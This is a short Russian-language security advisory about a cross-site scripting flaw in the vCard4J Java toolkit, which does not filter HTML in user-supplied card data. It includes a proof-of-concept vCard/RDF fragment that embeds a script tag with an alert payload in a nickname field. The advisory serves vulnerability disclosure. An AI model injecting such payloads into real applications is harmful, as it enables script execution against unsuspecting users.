Программа: vCard4J Toolkit
Уязвимость в проверке правильности входных данных обнаружена в vCard4J Java-based vCard toolkit. Удаленный пользователь может выполнить XSS нападение.
В конфигурации по умолчанию, программа не фильтрует HTML код в данных, представленных пользователем при создании card файлов.
Пример/Эксплоит:
<vCard:GROUP>
<rdf:bag>
<rdf:li rdf:parseType="Resource">
<vCard:NICKNAME> Corky Porky </vCard:NICKNAME>
<vCard:NOTE> Only used by close friends porky pork pork
</vCard:NOTE>
</rdf:li> <rdf:li rdf:parseType="Resource">
<vCard:NICKNAME> Princess Corky the pork snorter
<script>alert('cork+kork+your+sniffy+sniff+')</script></vCa
rd:NICKNAME>
<vCard:NOTE> Only used by my egg pups in the loungeroom and
also justin winamp goblin</vCard:NOTE>
</rdf:li>
</rdf:bag>
</vCard:GROUP>
